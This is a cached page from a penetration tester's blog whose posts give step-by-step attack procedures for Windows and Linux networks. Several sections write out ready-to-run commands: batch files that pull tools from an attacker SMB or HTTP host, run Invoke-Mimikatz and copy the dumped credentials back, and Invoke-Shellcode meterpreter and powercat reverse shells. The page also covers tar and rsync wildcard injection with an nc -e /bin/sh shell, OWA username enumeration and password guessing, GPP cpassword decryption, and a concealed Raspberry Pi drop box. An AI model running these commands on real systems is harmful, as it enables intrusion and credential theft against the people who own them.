This is Google's cache of https://blog.barcia.me/. It is a snapshot of the page as it appeared on Aug 3, 2018 17:44:46 GMT. The current page could have changed in the meantime. Learn more.
Full versionText-only versionView source
Tip: To quickly find your search term on this page, press Ctrl+F or ⌘-F (Mac) and use the find bar.
Sec Me | Information Security

Menu

July 30, 2016 by joseph

Powershell…We Don’t Need no Stinking Powershell – Part 1 of 2

Problem:

On a recent pen test, the client had disabled PowerShell on all of the workstations. Additionally, we identified an elevated service account was sending encrypted passwords across the network, however, they also had a GPO policy that would remove our local admin every five minutes. Utilizing the System libraries in C# (System.Management.Automation), we are able to create our own “powershell.exe” without the powershell.exe, create a malicious executable, and relay it to a workstation or server.

The System.Management.Automation namespace is the root namespace for Windows PowerShell. It contains classes, enumerations, and interfaces. Using this same library, we can create and compile our own powershell.exe. Ben0xA has already done this for us with NPS.

Links:

https://msdn.microsoft.com/en-us/library/system.management.automation(v=vs.85).aspx

https://github.com/Ben0xA/nps/blob/master/nps/Program.cs

Solution (The Dirty Way):

The solution requires appropriate enumeration to be performed on the target and the system architecture identified. Additionally, I will provide three attacks (invoke-mimikatz, invoke-shellcode, and ps1encode) and two delivery methods (SMB and HTTP). The following commands provided below are examples and can be used as bat files or compiled into executables of the architecture of the target. In the examples provided, I have created NPSx64.exe (64 bit) and NPSx86.exe (32 bit).

Compiling the Source

Compiling x86

csc.exe /unsafe /reference:”C:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll” /reference:System.IO.Compression.dll /out:NPSx86.exe /platform:x86 “nps\*.cs”

Compiling x64

csc.exe /unsafe /reference:”C:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll” /reference:System.IO.Compression.dll /out:NPSx64.exe /platform:x64 “nps\*.cs”

invoke-mimikatz (SMB)

bat file

net use \\192.168.31.137\AnonShare && (if %PROCESSOR_ARCHITECTURE% == AMD64 (copy /Y \\192.168.31.137\AnonShare\NPSx64.exe C:\Users\Public\nps.exe) Else (copy /Y \\192.168.31.137\AnonShare\NPSx86.exe C:\Users\Public\nps.exe)) && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘\\192.168.31.137\AnonShare\ps\im.txt’); Invoke-Mimikatz -DumpCreds > c:\Users\Public\mimi.txt” && ping -n 20 127.0.0.1 && copy /Y C:\Users\Public\mimi.txt \\192.168.31.137\AnonShare\mimi.txt

Let’s break this down:

Command Description
net use \\192.168.31.137\AnonShare Mount anonymous share on the attacker system
(if %PROCESSOR_ARCHITECTURE% == AMD64

(copy /Y \\192.168.31.137\AnonShare\NPSx64.exe C:\Users\Public\nps.exe) Else

(copy /Y \\192.168.31.137\AnonShare\NPSx86.exe C:\Users\Public\nps.exe))

Determine the processor architecture and download the appropriate copy via SMB to the Public Users directory
ping -n 20 127.0.0.1 Wait approximately 20 seconds for the file to transfer over
cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘\\192.168.31.137\AnonShare\ps\im.txt’); Invoke-Mimikatz -DumpCreds > c:\Users\Public\mimi.txt” Execute Invoke-Mimikatz via SMB and save the output locally to the Public Users directory
ping -n 20 127.0.0.1 Wait approximately 20 seconds for invoke-mimikatz to finish
copy /Y C:\Users\Public\mimi.txt \\192.168.31.137\AnonShare\mimi.txt Copy over the mimikatz output to our anonymous SMB share

invoke-shellcode (HTTP)

bat file

echo Dim xHttp: Set xHttp = CreateObject(“Microsoft.XMLHTTP”) > C:\Users\Public\nps.vbs && echo Dim bStrm: Set bStrm = CreateObject(“Adodb.Stream”) >> C:\Users\Public\nps.vbs && echo Dim WshShell >> C:\Users\Public\nps.vbs &&echo Dim WshProcEnv >> C:\Users\Public\nps.vbs &&echo Dim system_architecture >> C:\Users\Public\nps.vbs &&echo Dim process_architecture >> C:\Users\Public\nps.vbs &&echo Set WshShell =  CreateObject(“WScript.Shell”) >> C:\Users\Public\nps.vbs &&echo Set WshProcEnv = WshShell.Environment(“Process”) >> C:\Users\Public\nps.vbs &&echo process_architecture= WshProcEnv(“PROCESSOR_ARCHITECTURE”) >> C:\Users\Public\nps.vbs &&echo If process_architecture = “x86” Then >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx86.exe“, False >> C:\Users\Public\nps.vbs && echo Else  >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx64.exe“, False >> C:\Users\Public\nps.vbs && echo End If >> C:\Users\Public\nps.vbs && echo xHttp.Send >> C:\Users\Public\nps.vbs && echo With bStrm >> C:\Users\Public\nps.vbs && echo .Type = 1 ‘//binary >> C:\Users\Public\nps.vbs && echo .Open >> C:\Users\Public\nps.vbs && echo .write xHttp.responseBody >> C:\Users\Public\nps.vbs && echo .savetofile “C:\Users\Public\nps.exe”, 2 ‘//overwrite >> C:\Users\Public\nps.vbs && echo End With >> C:\Users\Public\nps.vbs && cmd.exe /c START /MIN cscript C:\Users\Public\nps.vbs && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.31.137/ps/is.txt’); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.31.137 -Lport 443 -force”

Let’s break this down:

Command Description
echo Dim xHttp: Set xHttp = CreateObject(“Microsoft.XMLHTTP”) > C:\Users\Public\nps.vbs

echo Dim bStrm: Set bStrm = CreateObject(“Adodb.Stream”) >> C:\Users\Public\nps.vbs

echo Dim WshShell >> C:\Users\Public\nps.vbs

echo Dim WshProcEnv >> C:\Users\Public\nps.vbs

echo Dim system_architecture >> C:\Users\Public\nps.vbs

echo Dim process_architecture >> C:\Users\Public\nps.vbs

echo Set WshShell =  CreateObject(“WScript.Shell”) >> C:\Users\Public\nps.vbs

echo Set WshProcEnv = WshShell.Environment(“Process”) >> C:\Users\Public\nps.vbs

echo process_architecture= WshProcEnv(“PROCESSOR_ARCHITECTURE”) >> C:\Users\Public\nps.vbs

echo If process_architecture = “x86” Then >> C:\Users\Public\nps.vbs

echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx86.exe“, False >> C:\Users\Public\nps.vbs

echo Else  >> C:\Users\Public\nps.vbs

echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx64.exe“, False >> C:\Users\Public\nps.vbs

echo End If >> C:\Users\Public\nps.vbs

echo xHttp.Send >> C:\Users\Public\nps.vbs

echo With bStrm >> C:\Users\Public\nps.vbs

echo .Type = 1 ‘//binary >> C:\Users\Public\nps.vbs

echo .Open >> C:\Users\Public\nps.vbs

echo .write xHttp.responseBody >> C:\Users\Public\nps.vbs

echo .savetofile “C:\Users\Public\nps.exe”, 2 ‘//overwrite >> C:\Users\Public\nps.vbs

echo End With >> C:\Users\Public\nps.vbs

Create a VBS version of wget to determine the processor architecture and download the appropriate copy via SMB to the Public Users directory
cmd.exe /c START /MIN cscript C:\Users\Public\nps.vbs Execute the VBS script
ping -n 20 127.0.0.1 Wait approximately 20 seconds for the download to complete to the Public User directory
cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.31.137/ps/is.txt’); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.31.137 -Lport 443 -force” Execute the invoke-shellcode command

Ps1encode (SMB)

bat file

net use \\192.168.31.137\AnonShare && (if %PROCESSOR_ARCHITECTURE% == AMD64 (copy /Y \\192.168.31.137\AnonShare\NPSx64.exe C:\Users\Public\nps.exe) Else (copy /Y \\192.168.31.137\AnonShare\NPSx86.exe C:\Users\Public\nps.exe)) && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe -encodedcommand OUTPUT_FROM_PS1ENCODE

See above for a description of the command.

Ps1encode (HTTP)

bat file

echo Dim xHttp: Set xHttp = CreateObject(“Microsoft.XMLHTTP”) > C:\Users\Public\nps.vbs && echo Dim bStrm: Set bStrm = CreateObject(“Adodb.Stream”) >> C:\Users\Public\nps.vbs && echo Dim WshShell >> C:\Users\Public\nps.vbs &&echo Dim WshProcEnv >> C:\Users\Public\nps.vbs &&echo Dim system_architecture >> C:\Users\Public\nps.vbs &&echo Dim process_architecture >> C:\Users\Public\nps.vbs &&echo Set WshShell =  CreateObject(“WScript.Shell”) >> C:\Users\Public\nps.vbs &&echo Set WshProcEnv = WshShell.Environment(“Process”) >> C:\Users\Public\nps.vbs &&echo process_architecture= WshProcEnv(“PROCESSOR_ARCHITECTURE”) >> C:\Users\Public\nps.vbs &&echo If process_architecture = “x86” Then >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx86.exe“, False >> C:\Users\Public\nps.vbs && echo Else  >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx64.exe“, False >> C:\Users\Public\nps.vbs && echo End If >> C:\Users\Public\nps.vbs && echo xHttp.Send >> C:\Users\Public\nps.vbs && echo With bStrm >> C:\Users\Public\nps.vbs && echo .Type = 1 ‘//binary >> C:\Users\Public\nps.vbs && echo .Open >> C:\Users\Public\nps.vbs && echo .write xHttp.responseBody >> C:\Users\Public\nps.vbs && echo .savetofile “C:\Users\Public\nps.exe”, 2 ‘//overwrite >> C:\Users\Public\nps.vbs && echo End With >> C:\Users\Public\nps.vbs && cmd.exe /c START /MIN cscript C:\Users\Public\nps.vbs && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe -encodedcommand OUTPUT_FROM_PS1ENCODE

See above for a description of the command.

 

PART 2 COMING SOON

 
July 24, 2016 by joseph

You had me at EHLO … Using OWA for Effective Reconnaissance

Problem

Outside of recon-ng and theharvester, I could not find any well documented user name enumeration techniques. I did find a blog post here and there about brute forcing passwords and possible username enumeration, but nothing complete and in one location. The goal here is to enumerate the domain, usernames, possible passwords, and whether multi-factor authentication is enabled on an exposed Microsoft OWA server.

Solution

Determining the Version of Exchange

The table below should be used as a reference to determine the current version of Exchange.

OWA Version URI
OWA 2003 /exchweb/bin/auth/owaauth.dll

/exchange/

OWA 2007 /owa/auth/owaauth.dll

/owa/

OWA 2010 /owa/auth.owa

/owa/

OWA 2013 /owa/auth.owa

/owa/

Determining the Domain

Using Burp proxy, we should attempt to access the following URIs, when prompted, just enter a user/pass of test/test:

Take note of the Request, we should see something along the lines of “Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==”

1 - domain request

Next, navigate to the Response tab, and take note of the WWW-Authenticate: NTLM response:

2 - domain response

Copy that long NTLM response and now navigate to the Decoder tab and paste it in and select Decode as Base64. In the new box underneath select the Text radio button. And look what we have here…

3 - domain burp decode

Here is a breakdown of the information:

1: Domain: N…..1

2: Server: …..Exchange01

3: FQDN: n…..1.com

Enumerating Usernames

My favorite list of usernames is the US Census list, first initial and last name. Making a copy of that user list, we need to append the domain name to the beginning of each user. In this example I will be using a smaller user list.

To append the domain to the beginning of each line:

sed -e ‘s/^/domain\\/’ userfile.txt > newuserfile.txt

Now that we have our userlist, enable Interceptor and navigate to the OWA login page and enter dummy credentials. Proceed to the Proxy tab and right Click and select Send to Intruder.

4 - enum users intercept

Select the Intruder tab, the new tab that opened 1/2/3/…, then Positions. Select Clear, to clear out the variables, then highlight the username entered (next to the username= variable) and select Add. I also changed the password= to Summer2016, for a quick password guess against all usernames.

5 - enum users intrude

Select the Payloads tab, load in our userlist, and select Start Attack.

NOTE: In the Options tab, you can configure the threads, number of retries, pause between retries, and my favorite grep (you can grep for success or failure responses).

Once the attack has finished, click on the Results tab and sort by Response Completed. Notice the drastic differences in the times (This is known as a timing attack)? The accounts that take a longer time to respond are invalid accounts.

6 - enum users intrude results

In the example, the following accounts with lower response times are valid and was confirmed during post exploit.

Once we have a list of valid accounts, we can make a new userlist with only valid accounts and continue with our password guessing. I recommend only performing two password guesses a day, but you should always confirm with your POC how many guesses are allowed before an account is locked out. A successful password guess would have a different size response length due to the fact that a successful login page would have different content, other than an invalid username/password returned.

7 - intrude sucess

Determining if Multi-factor is Enabled (Courtesy of Black Hills Security) 

Microsoft Multi-Factor Authentication (MFA) requires users to acknowledge a phone call or a text message before granting access to the resource. After correct credentials are entered, the server waits for  the user to verify the attempt (by pressing “#” on the phone call they receive for example). This is awesome from a security perspective; however, Microsoft still gives away whether the password is correct in its server response to valid credentials. The response is only slightly different but it is enough to determine if a password is valid or invalid.

Valid/Invalid Passwords Response Received
Valid Password /owa/auth.owa&reason=2
Invalid Password /owa/&reason=2

Note the extra “auth.owa” in the response URI.

NOTE: When executing this attack, the user will receive a text or phone call with the multifactor indicated.

 

 
July 5, 2016 by joseph

Don’t Trust that Wildcard (*)…Hacking like its 1980, UNIX Style!

Problem

While hacking a boot2root, I was able to compromise a webserver and gain access to the www-data account. My normal privilege escalation tricks were not working, there were no misconfigured services or cron jobs running as root that I could modify. Running uname or viewing /etc/issue came up with a modified Linux version that I could not use to determine the accurate kernel version. Access to sensitive files, root, and home directories also provided no success. While browsing the cron jobs, it was determined that there was a script file that executed as root, although I could not modify this script, I could read the file and I identified a simple script that archives the web directory by using a wildcard (*).

 

Background

A wildcard is a character, or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by shell before any other action is taken.

 

Some Shell Wildcards:

*     An asterisk matches any number of characters in a filename, including none.

?     The question mark matches any single character.

[ ]   Brackets enclose a set of characters, any one of which may match a single character at that position.

–     A hyphen used within [ ] denotes a range of characters.

~     A tilde at the beginning of a word expands to the name of your home directory.  If you append another user’s login name to the character, it refers to that user’s home directory.

 

Basic example of wildcards usage:

# ls *.php                      – List all files with PHP extension

# rm *.gz                       – Delete all GZIP files

# cat backup*                – Show content of all files which name is beginning with ‘backup’ string

# ls test?                       – List all files whose name is beginning with string ‘test’ and has exactly one additional character

 

So Where Is The Problem? I Use Wildcards All The Time

When using shell wildcards, especially asterisk (*), Unix shell will interpret files beginning with hyphen (-) character as command line arguments to executed command/program. That leaves space for variation of classic channeling attack. Channeling problem will arise when different kind of information channels are combined into single channel. Practical cases in this technique is combining arguments and filenames, as different “channels” into a single command execution, because of using shell wildcards. Don’t understand? That’s ok, just keep reading on.

 

So How Can We Weaponize This?

Below are some of the common commands that we would find in scripts or cron jobs that are executed by administrators.

NOTE: This attacks require write access to the directory.

rm

By adding a filename ‘-rf’ we can recursively delete all files and directories should an ‘rm *’ command is executed.

File Names Required: -rf
Executed Command: rm *
Actual Command Executed: rm * -rf
rm

rm *

chown

By adding a reference file (.drf.txt) and a file named –reference=.drf.txt we are able to overwrite the specified owner when the chown command is executed with a wildcard.

File Names Required:

.drf.txt
  –reference=.drf.txt
Executed Command: chown -R nobody:nobody *.txt
Actual Command Executed: chown -R nobody:nobody *.txt –reference=.drf.txt
chown

chown -R nobody:nobody *.txt

We can also create a symbolic link in that directory that points to /etc/shadow and the ownership of /etc/shadow would also be changed

All your base are belong to us!

chmod

chmod works the same way as chown, using the same filenames. By adding a reference file .drf.txt and making it world read/write/execute, we can copy those permissions to the files covered under the wildcard. In this example we also added a file name ‘-R’ for some recursive action.

File Names Required: .drf.txt
  –reference=.drf.txt
-R
Executed Command: chmod 000 *
Actual Command Executed: chmod 000 * -R –reference=.drf.txt
chmod

chmod 000 *

tar

tar is a tool for archiving files and is commonly found in cron jobs. Using tar, we can perform command execution and create a reverse shell back to our attacker.

File Names Required: –checkpoint=1
  –checkpoint-action=exec=sh shell.sh
shell.sh
shell.txt

nc 127.0.0.1 80 -e /bin/sh

Executed Command: tar cf archive.tar *
Actual Command Executed: tar cf archive.tar * –checkpoint=1 –checkpoint-action=exec=sh shell.sh
tar

tar cf archive.tar *

rsync

rsync is a remote copy tool that is often used in cron jobs as well. Rsync can execute commands by using the ‘-e’ flag.

File Names Required: -e sh shell.txt
shell.txt
shell.txt

nc 127.0.0.1 80 -e /bin/sh

Executed Command: rsync –t *.txt foo:src/
Actual Command Executed: rsync –t *.txt -e sh shell.txt foo:src/
rsync

rsync –t *.txt foo:src/

REFERENCE: https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

 
May 7, 2016 by joseph

How I Compromised Your Network Through Your Printer

On my last engagement, the client network was hardened pretty well. The typical escalation path of sniffing the network, anonymous enumeration, and kerb guessing was not providing any results. After some enumeration it was determined that the systems were fully patched and default passwords were changed on all of the web servers…except for the printers.

Once access to the administrator console for the printer was gained, it was determined that the printer was configured to save documents to a network share. Using the developers tools built into Firefox, we were able to debug the running application to view the network password for the account used to save the scanned documents to the network share.

NOTE: Other alternatives include using the FireBug plugin, or configuring the network share to point to a rogue SMB server to capture the password hash.

Printer Save To File Page

Printer Save To File Page

Once a valid user account was found for the client domain, we now have read access to the domain controller and policies. After mounting the sysvol directory on the domain controller, a quick search found a groups.xml file and the client has configured the local administrator password through Group Policy Preferences. With access to the cpassword value, we can now decrypt the value to obtain the local administrator password.

Microsoft has released a security advisory in regards to the escalation of privileges through group policy preferences: https://support.microsoft.com/en-us/kb/2962486

SYSVOL mounted and CPASSWORD extracted

SYSVOL mounted and CPASSWORD extracted

Administrator password decrypted using gpp_extract.rb

Administrator password decrypted using gpp_extract.rb

Once the local administrator account and password was obtained, it was tested against the Windows devices within the network. Using WMI and powershell, a workstation where a domain administrator was located and mimikatz was executed allowing access to their cleartext passwords stored in memory. For more information on using WMI and powershell, see my previous blog post WMI Still Using PSEXEC.

COMMANDS (Once a valid user account has been found):

C:\> net use \\<DOMAIN_CONTROLLER>\sysvol /u:<DOMAIN>\<USERNAME> <PASSWORD>
C:\> dir /b /s \\<DOMAIN_CONTROLLER>\sysvol\groups.xml
C:\>type \\<DOMAIN_CONTROLLER>\sysvol\<PATH\TO>\Groups.xml | find /i “cpassword”

# ruby gpp_extract.rb -e <CPASSWORD_VALUE>

 
April 12, 2016 by joseph

Powershellery via Metasploit

Powershell has become the go to scripting language for both red teams and blue teams with its versatile .net and windows API connections. It has also become standard in many third party applications making it difficult to disable on Windows devices without the possibility of breaking functionality. If a client does disable or blacklist the powershell.exe, we can easily bypass that by making our own powershell executable using Ben0xA’s AwesomerShell.

Configuration

Recently a new module for metasploit has been introduced that allows an attacker to import, execute, or drop into a powershell shell. As of the time of this blog, the import functionality is not included with the repository version of metasploit. To include this functionality, perform the following:

  1. mv /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb.orig

  2. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/04caa9affdeda5ee083e2d2e85d1a3d7a88f8393/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb -O /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb

  3. mv /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/powershell.rb /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/powershell.rb.orig

  4. wget https://raw.githubusercontent.com/OJ/metasploit-framework/ce8a6f57a004987d21c1bd672e362304dd440f16/lib/rex/post/meterpreter/extensions/powershell/powershell.rb -O /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/powershell.rb

  5. mv /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/tlv.rb /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/tlv.rb.orig

  6. wget https://raw.githubusercontent.com/OJ/metasploit-framework/ce8a6f57a004987d21c1bd672e362304dd440f16/lib/rex/post/meterpreter/extensions/powershell/tlv.rb -O /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/tlv.rb

Powershell Reverse Handler

Prior to this module, in order to get an interactive powershell session, you needed to inject a powershell payload. This could be an issue if you already have a shell and would like a powershell shell, especially if you have an ongoing social engineering campaign and can’t shutdown your handler, now you need to rely on another outbound port being opened. In order to execute a reverse powershell we can do the following (Note, this assumes the workstation is already compromised by other means):

run multi_meter_inject -pt windows/powershell_reverse_tcp -mr 10.5.10.71 -p 8080

3

multi_meter_inject

4

powershell session

Alternative Powershell Module

Going back to our original session, we can now perform a “load powershell” to load the powershell module and view the help files.

load powershell

load powershell

powershell_shell

Dropping down to a shell we can execute some quick powershell commands to help with our recon.

powershell_shell

get-process

get-process

SPN query for SQL servers

SPN query for SQL servers

powershell_import / powershell_execute

With the option to download and execute powershell scripts in memory, we can run the majority of powersploit, powerpen, powerup scripts, however having the option to import and execute allows us red teamers another option to execute custom scripts.

powershell_import powershell.ps1

powershell_execute “powershell_function -arg 1 -arg 2“

Invoke-Inveigh and output file

Invoke-Inveigh and output file

 
March 31, 2016 by joseph

Red PI – Raspberry PI Dropbox 2.0

So it has been a few months since I last picked up my raspberry pi to continue on my mission of creating an ultimate dropbox tool for my arsenal. Of course I could always just buy a PWNplug and call it a day but then I can’t have any fun designing and implementing a hardware hack! Last time we left off and I had created a Raspberry PI dropbox script which would make it easy to create a dropbox that phones home via SSH or creates a wireless access point to connect to. I have since updated the script for the following:

In addition to the changes to the deployable script mentioned above, I found some old hardware laying around including an old APC surge protector and an HP power brick. I placed the USB components within the APC power strip and the raspberry pi within the old HP power brick and attached the two devices together with some double sided tape. With some quick modifications, my device was complete.

 

IMG_20160301_135826

APC power strip internal components

IMG_20160301_135845

APC internal components, phone surge protection removed, replaced with 2 cat 5e wall jacks

IMG_20160301_135902

APC surge protector

IMG_20160301_142328

APC Surge protector components removed

IMG_20160330_215901

APC filled with 2 USB NICs, USB 4G modem, USB wireless adapter, and USB hub…Raspberry PI within HP power brick

IMG_20160330_215913

APC filled with 2 USB NICs, USB 4G modem, USB wireless adapter, and USB hub

IMG_20160330_215943

APC filled with 2 USB NICs, USB 4G modem, USB wireless adapter, and USB hub

IMG_20160330_220323

APC surge protector and HP power brick complete, attached with double sided tape

IMG_20160330_220527

Raspberry PI inside HP power brick

 
March 4, 2016 by joseph

OSCP Review

Today, I receive an email from the Offensive Security team:

“Dear Joseph,

We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.”

For the previous 90 days I had the chance to take one of the best penetration testing courses available today. I have read many pentest books and I perform penetration testing on a daily basis, however nothing can really prepare you for the Offensive Security Penetration Testing with Kali training course. This blog is an overview of the course and exam and what to expect.

https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

At the time of my course time, the lab consisted of over 50 targets to attack and 4 networks to pivot into. Once connected to the lab, the student is presented with approximately 40 targets on the public network with the opportunity to pivot into a development, IT, and an administrator network. Once on those networks, the attacker is presented with more targets to further enumerate and exploit with the end goal to eventually gain access into the administrator network via pivoting from the public network through the IT network and finally into the admin network.

Overall, the course was very challenging and I often found myself over complicating the problem when the answer was right in front of me. Although the course teaches the student some basic tools used by penetration testers, it is not a designed to teach you how to use a bunch of tools like other courses. The course is setup to teach the student the proper methodology on how to become a great penetration tester and how to properly enumerate targets and the IT environment. If you are looking for a course just to teach you about the tools, this is not the course for you, however if you want to learn how to properly enumerate targets, research exploits, customize exploit code to work in your specific environment, and how to pivot from environment to environment…then this is the course for you.

Exam time…The exam consisted of 5 systems, each one with different point values depending on difficulty of exploitation. The student is not required to fully compromise a system to get points, for example, a low privilege shell/access would give the student half the points as a full compromise, however, for my exam, full compromise is required on 4/5 systems to pass the exam. The exam requires a minimum of 70 points to pass plus a penetration test report showing screenshots of the exploit, any code changes to exploits used, and a proof file located on each system under the administrator account. The report should provide enough detail to walk a user through the exploit step-by-step.

Final remarks…although this course is challenging, I would not say it is impossible, even for someone with no experience. This course and the certification will not be handed to you…you will need to put in the extra work and hours to do your own research. Additionally, there is no right or wrong way to exploit the systems in the lab or exam. I found myself exploiting some systems using different exploits or techniques as some of the students (once you pass the exam, you will be granted access into a hidden forum where students that passed the exam can discuss the techniques used to exploit systems). My advice is if you are stuck and banging your head against a wall, it will happen, take a step back and redo your enumeration. The Offensive Security team has placed numerous rabbit holes within the system that lead nowhere to trip up the students. Good luck and have fun, it is a great learning experience!

offsec-student-certified-emblem-rgb-oscp

 
October 30, 2015 by joseph

Rasppi Dropbox Easy Deploy

Problem:

When performing social engineering or some red team engagements, some times the easiest thing to do is to just drop a device on the network and run. With Network Access Controls in place, this can sometimes be a daunting task. If you drop a device on the network there is a chance it will get flagged and moved to a guest VLAN.

rasppi dropbox

Solution:

As Raspberry PIs become more powerful and cheaper, creating and deploying Raspberry PIs  as a valuable social engineering or red team drop box is a no brainer.  With two USB NICs and a USB WIFI card (OPTIONAL USB 4G card), a Raspberry PI could easily become a common goto for a dropbox. Measuring only 7″x3″x2″, the Raspberry Pi is easily concealable in an enclosure or “power brick”. Creating the Raspberry PIs can be automated to help create multiple devices quickly.

https://github.com/jbarcia/RaspPi-Dropbox

./raspi-config.sh

Command line arguments:

–base    = Base configuration hostname/password/ssh keys

–tft     = Installs and configures TFT patched kernel

–wifi    = Configure wifi AP to start on boot

–ssh     = Configure ssh phone home

How To:

Examples:

./raspi-config.sh –base –ssh

 

 

The –ssh changes the ssh keys (again) incase you want to redeploy a device (DO NOT SET A PASSPHRASE), asks for the main ssh server, then uploads the public key to the authorized_keys. Creates a cron script to auto ssh every 5 minutes.

base

–base execution

ssh

–ssh execution

  1. The connection back to server
  2. The Username of the account to ssh into
  3. The pivot port to SSH into
  4. Generates SSH keys (leave passphrase blank)
  5. SSH into connection back server and puts public key of the Raspberry PI into .authorized_hosts
ssh_config

ssh autorun script

ssh_cron

ssh cron job

 

./raspi-config.sh –base –wifi

The –wifi starts the pi in wifi AP mode with all NICS down, asks for SSID and WPA passphrase during configuration. While in a parking lot, an attacker can access the device, start up eth1 or eth2 with mac spoofing or start both NICs for 802.1x bypass.

wifi

–wifi execution

  1. Enter desired SSID
  2. Enter WPA-PSK passphrase
wifi_configs

Wireless AP and DNS configs

wifi_boot

rc.local boot config

 

Removal

To remove the auto SSH every 5 minutes, simple delete the cron job file:

/etc/cron.d/autossh

To prevent the Access Point from starting at boot, delete the following line from /etc/rc.local:

sh /root/config_ap.sh

 

Possible Future Updates

Adding a 4G modem, allowing all remote connections to never touch the corporate network. With the 4G modem it would both increase the stealth (no SSH connections out) and expand our reach (limited by wifi).

 

 
October 11, 2015 by joseph

WMI Still Using PSExec?

Problem

On my last pen job, I noticed the majority of the team was still using PSEXEC to remote into target systems. PSEXEC connects to the target, copies psexesvc.exe to the Admin$ share, and launches it as a temporary service. The psexesvc on the target then launches the executable specified. PSEXEC and psexesvc use pipes to handle keyboard input and screen output. Once the executable finishes, the psexesvc will terminate and remove itself from the services list, and PSEXEC will exit. PSexec style tools such as the psexec module in Metasploit, smbexec, winexe, or even the original sysinternals tool produce numerous points in the creation process that a client would be able to log and alert on PSEXEC, as well as, some A/V providers and modern defense tools such as Bit9 detect the rogue binaries on the systems alerting on the process as well.

 

Solution

Using WMI (Windows Management Instrumentation) provides another path to execute code and commands on remote systems without touching disk. The advantage of WMI over other methods of remote command execution is that it doesn’t rely on SMB and starting a service on the remote host.  In most cases, it flies beneath the radar and it just might be the easiest way to get a shell on a remote host without writing to the disk. WMI tools on Kali have the ability to use the actual password or the hash. WMI communications use TCP port 135 and afterwards a random port is negotiated.

 

Detection/Prevention

The following detection methods can be implemented by clients to help detect malicious WMI calls. Clients should collect and analyze the Microsoft-Windows-WinRM/Operational, Microsoft-Windows-WMI-Activity/Operational, Microsoft-Windows-DistributedCOM logs. WMI can also be permanently blocked by disabling the Winmgmt service.

 

Tools

WMIexec.py

WMIexec can be used to drop the attacker into a semi-interactive shell on the targets system or add a command to execute.

/toolslinux/exploits/impacket/examples/wmiexec.py

USERNAME/PASS

wmiexec.py <DOMAIN>/<USERNAME>:<PASSWORD>@<IP_ADDRESS> [command]

HASH

wmiexec.py -hashes <LMHASH:NTHASH> <DOMAIN>/<USERNAME>@<IP_ADDRESS> [command]

USERNAME

wmiexec.py <DOMAIN>/<USERNAME>@<IP_ADDRESS> [command]

PTH-wmic / PTH-wmis

pth-wmis -U ‘<DOMAIN>\<USERNAME>%<LMHASH:NTHASH>’ //<IP_ADDRESS> [command]

pth-wmis -U ‘<DOMAIN>\<USERNAME>%<LMHASH:NTHASH>’ //<IP_ADDRESS> “cmd.exe /c powershell.exe …”

Metasploit

For metasploit fanboys…

use  exploit/windows/wmiexec

       set RHOSTS

set SMBDomain

set SMBPass

set SMBUser

set LHOST

 

Examples

Mimikatz Dump Creds

python /toolslinux/exploits/impacket/examples/wmiexec.py -hashes <LANMAN>:<NTLM> <DOMAIN>/<USERNAME>@<IP_ADDRESS> powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://<WEB_HOST>/PowerSploit-master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”

wmi_mimi

Dump Local User Hashes

python /toolslinux/exploits/impacket/examples/wmiexec.py <DOMAIN>/<USERNAME>@<IP_ADDRESS> powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://<WEB_HOST>/nishang-master/Gather/Get-PassHashes.ps1’); Get-PassHashes ”

wmi_dump-hash

Powercat Shell

python /toolslinux/exploits/impacket/examples/wmiexec.py <DOMAIN>/<USER>@<IP_ADDRESS> powershell “-nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘http://<WEB_HOST>/powercat-master/powercat.ps1’); powercat -c <LISTENER> -p <PORT> -ep”

DOS Command Prompt

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘http://10.32.155.36/powercat-master/powercat.ps1’); powercat -c 10.32.155.36 -p 8081 -e cmd

